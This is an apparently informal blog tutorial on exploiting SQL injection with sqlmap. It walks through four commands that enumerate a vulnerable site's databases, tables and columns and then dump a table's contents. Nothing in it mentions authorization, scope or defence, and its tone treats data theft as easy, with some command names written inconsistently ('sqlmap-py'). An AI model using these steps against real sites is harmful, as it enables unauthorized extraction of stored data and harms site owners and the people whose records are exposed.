[SQL Injection] How to use SQLmap.py

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Step 1: Get database name
command: sqlmap.py -u "url have an error Sql injection bug" --dbs 
 

Step 2: Get Tables
command: sqlmap.py -u "url have an error Sql injection bug" -D databasename --tables
 

Step 3: View Column
command: sqlmap-py -u "url have an error Sql injection bug" -D databasename -T yourtable --columns

I think you don't need this picture any more :3

Step 4: dumpp data of table
 sqlmap-py -u "url have an error Sql injection bug" -D databasename -T yourtable --dump

SEE, really easy, huh ^^ Done tutorial

- If you don't have the support style .py so, you can view this tutorial to install Python support.
Click here! (updating)
- If you don't have sqlmap you can download here!
If you don't understand, so you can watch my video ^^